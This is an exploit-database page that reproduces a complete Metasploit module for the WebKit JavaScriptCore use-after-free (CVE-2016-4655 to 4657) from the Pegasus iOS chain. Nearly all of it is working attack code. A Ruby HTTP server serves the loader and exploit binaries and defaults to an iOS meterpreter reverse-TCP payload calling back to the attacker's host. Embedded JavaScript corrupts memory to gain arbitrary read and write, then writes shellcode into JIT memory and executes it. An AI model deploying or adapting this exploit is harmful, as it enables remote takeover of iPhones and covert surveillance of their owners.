WebKit not_number defineProperties Use-After-Free

2018.06.04
Credit: timwr
Risk: High
Local: No
Remote: Yes
CWE: CWE-200


CVSS Base Score: 7.1/10
Impact Subscore: 6.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: None
Availability impact: None

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => 'WebKit not_number defineProperties UAF', 'Description' => %q{ This module exploits a UAF vulnerability in WebKit's JavaScriptCore library. }, 'License' => MSF_LICENSE, 'Author' => [ 'qwertyoruiop', # jbme.qwertyoruiop.com 'siguza', # PhoenixNonce 'tihmstar', # PhoenixNonce 'timwr', # metasploit integration ], 'References' => [ ['CVE', '2016-4655'], ['CVE', '2016-4656'], ['CVE', '2016-4657'], ['BID', '92651'], ['BID', '92652'], ['BID', '92653'], ['URL', 'https://blog.lookout.com/trident-pegasus'], ['URL', 'https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/'], ['URL', 'https://www.blackhat.com/docs/eu-16/materials/eu-16-Bazaliy-Mobile-Espionage-in-the-Wild-Pegasus-and-Nation-State-Level-Attacks.pdf'], ['URL', 'https://github.com/Siguza/PhoenixNonce'], ['URL', 'https://jndok.github.io/2016/10/04/pegasus-writeup/'], ['URL', 'https://sektioneins.de/en/blog/16-09-02-pegasus-ios-kernel-vulnerability-explained.html'], ], 'Arch' => ARCH_AARCH64, 'Platform' => 'apple_ios', 'DefaultTarget' => 0, 'DefaultOptions' => { 'PAYLOAD' => 'apple_ios/aarch64/meterpreter_reverse_tcp' }, 'Targets' => [[ 'Automatic', {} ]], 'DisclosureDate' => 'Aug 25 2016')) register_options( [ OptPort.new('SRVPORT', [ true, "The local port to listen on.", 8080 ]), OptString.new('URIPATH', [ true, "The URI to use for this exploit.", "/" ]) ]) end def on_request_uri(cli, request) print_status("Request from #{request['User-Agent']}") if request.uri =~ %r{/loader$} print_good("Target is vulnerable.") local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2016-4655", "loader" ) loader_data = File.read(local_file, {:mode => 'rb'}) send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'}) return elsif request.uri =~ %r{/exploit$} local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2016-4655", "exploit" ) loader_data = File.read(local_file, {:mode => 'rb'}) payload_url = "tcp://#{datastore["LHOST"]}:#{datastore["LPORT"]}" payload_url_index = loader_data.index('PAYLOAD_URL') loader_data[payload_url_index, payload_url.length] = payload_url send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'}) print_status("Sent exploit (#{loader_data.size} bytes)") return end html = %Q^ <html> <body> <script> function load_binary_resource(url) { var req = new XMLHttpRequest(); req.open('GET', url, false); req.overrideMimeType('text/plain; charset=x-user-defined'); req.send(null); return req.responseText; } var mem0 = 0; var mem1 = 0; var mem2 = 0; function read4(addr) { mem0[4] = addr; var ret = mem2[0]; mem0[4] = mem1; return ret; } function write4(addr, val) { mem0[4] = addr; mem2[0] = val; mem0[4] = mem1; } filestream = load_binary_resource("exploit") var shll = new Uint32Array(filestream.length / 4); for (var i = 0; i < filestream.length;) { var word = (filestream.charCodeAt(i) & 0xff) | ((filestream.charCodeAt(i + 1) & 0xff) << 8) | ((filestream.charCodeAt(i + 2) & 0xff) << 16) | ((filestream.charCodeAt(i + 3) & 0xff) << 24); shll[i / 4] = word; i += 4; } _dview = null; function u2d(low, hi) { if (!_dview) _dview = new DataView(new ArrayBuffer(16)); _dview.setUint32(0, hi); _dview.setUint32(4, low); return _dview.getFloat64(0); } var pressure = new Array(100); var bufs = new Array(10000); dgc = function() { for (var i = 0; i < pressure.length; i++) { pressure[i] = new Uint32Array(0x10000); } for (var i = 0; i < pressure.length; i++) { pressure[i] = 0; } } function swag() { if (bufs[0]) return; for (var i = 0; i < 4; i++) { dgc(); } for (i = 0; i < bufs.length; i++) { bufs[i] = new Uint32Array(0x100 * 2) for (k = 0; k < bufs[i].length;) { bufs[i][k++] = 0x41414141; bufs[i][k++] = 0xffff0000; } } } var trycatch = ""; for (var z = 0; z < 0x2000; z++) trycatch += "try{} catch(e){}; "; var fc = new Function(trycatch); var fcp = 0; var smsh = new Uint32Array(0x10) function smashed(stl) { document.body.innerHTML = ""; var jitf = (smsh[(0x10 + smsh[(0x10 + smsh[(fcp + 0x18) / 4]) / 4]) / 4]); write4(jitf, 0xd28024d0); //movz x16, 0x126 write4(jitf + 4, 0x58000060); //ldr x0, 0x100007ee4 write4(jitf + 8, 0xd4001001); //svc 80 write4(jitf + 12, 0xd65f03c0); //ret write4(jitf + 16, jitf + 0x20); write4(jitf + 20, 1); fc(); var dyncache = read4(jitf + 0x20); var dyncachev = read4(jitf + 0x20); var go = 1; while (go) { if (read4(dyncache) == 0xfeedfacf) { for (i = 0; i < 0x1000 / 4; i++) { if (read4(dyncache + i * 4) == 0xd && read4(dyncache + i * 4 + 1 * 4) == 0x40 && read4(dyncache + i * 4 + 2 * 4) == 0x18 && read4(dyncache + i * 4 + 11 * 4) == 0x61707369) // lulziest mach-o parser ever { go = 0; break; } } } dyncache += 0x1000; } dyncache -= 0x1000; var bss = []; var bss_size = []; for (i = 0; i < 0x1000 / 4; i++) { if (read4(dyncache + i * 4) == 0x73625f5f && read4(dyncache + i * 4 + 4) == 0x73) { bss.push(read4(dyncache + i * 4 + (0x20)) + dyncachev - 0x80000000); bss_size.push(read4(dyncache + i * 4 + (0x28))); } } var shc = jitf; var filestream = load_binary_resource("loader") for (var i = 0; i < filestream.length;) { var word = (filestream.charCodeAt(i) & 0xff) | ((filestream.charCodeAt(i + 1) & 0xff) << 8) | ((filestream.charCodeAt(i + 2) & 0xff) << 16) | ((filestream.charCodeAt(i + 3) & 0xff) << 24); write4(shc, word); shc += 4; i += 4; } jitf &= ~0x3FFF; jitf += 0x8000; write4(shc, jitf); write4(shc + 4, 1); // copy macho for (var i = 0; i < shll.length; i++) { write4(jitf + i * 4, shll[i]); } for (var i = 0; i < bss.length; i++) { for (k = bss_size[i] / 6; k < bss_size[i] / 4; k++) { write4(bss[i] + k * 4, 0); } } fc(); } function go_() { if (smsh.length != 0x10) { smashed(); return; } dgc(); var arr = new Array(0x100); var yolo = new ArrayBuffer(0x1000); arr[0] = yolo; arr[1] = 0x13371337; var not_number = {}; not_number.toString = function() { arr = null; props["stale"]["value"] = null; swag(); return 10; }; var props = { p0: { value: 0 }, p1: { value: 1 }, p2: { value: 2 }, p3: { value: 3 }, p4: { value: 4 }, p5: { value: 5 }, p6: { value: 6 }, p7: { value: 7 }, p8: { value: 8 }, length: { value: not_number }, stale: { value: arr }, after: { value: 666 } }; var target = []; var stale = 0; Object.defineProperties(target, props); stale = target.stale; stale[0] += 0x101; stale[1] = {} for (var z = 0; z < 0x1000; z++) fc(); for (i = 0; i < bufs.length; i++) { for (k = 0; k < bufs[0].length; k++) { if (bufs[i][k] == 0x41414242) { stale[0] = fc; fcp = bufs[i][k]; stale[0] = { 'a': u2d(105, 0), 'b': u2d(0, 0), 'c': smsh, 'd': u2d(0x100, 0) } stale[1] = stale[0] bufs[i][k] += 0x10; // misalign so we end up in JSObject's properties, which have a crafted Uint32Array pointing to smsh bck = stale[0][4]; stale[0][4] = 0; // address, low 32 bits // stale[0][5] = 1; // address, high 32 bits == 0x100000000 stale[0][6] = 0xffffffff; mem0 = stale[0]; mem1 = bck; mem2 = smsh; bufs.push(stale) if (smsh.length != 0x10) { smashed(stale[0]); } return; } } } setTimeout(function() { document.location.reload(); }, 2000); } dgc(); setTimeout(go_, 200); </script> </body> </html> ^ send_response(cli, html, {'Content-Type'=>'text/html'}) end end


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top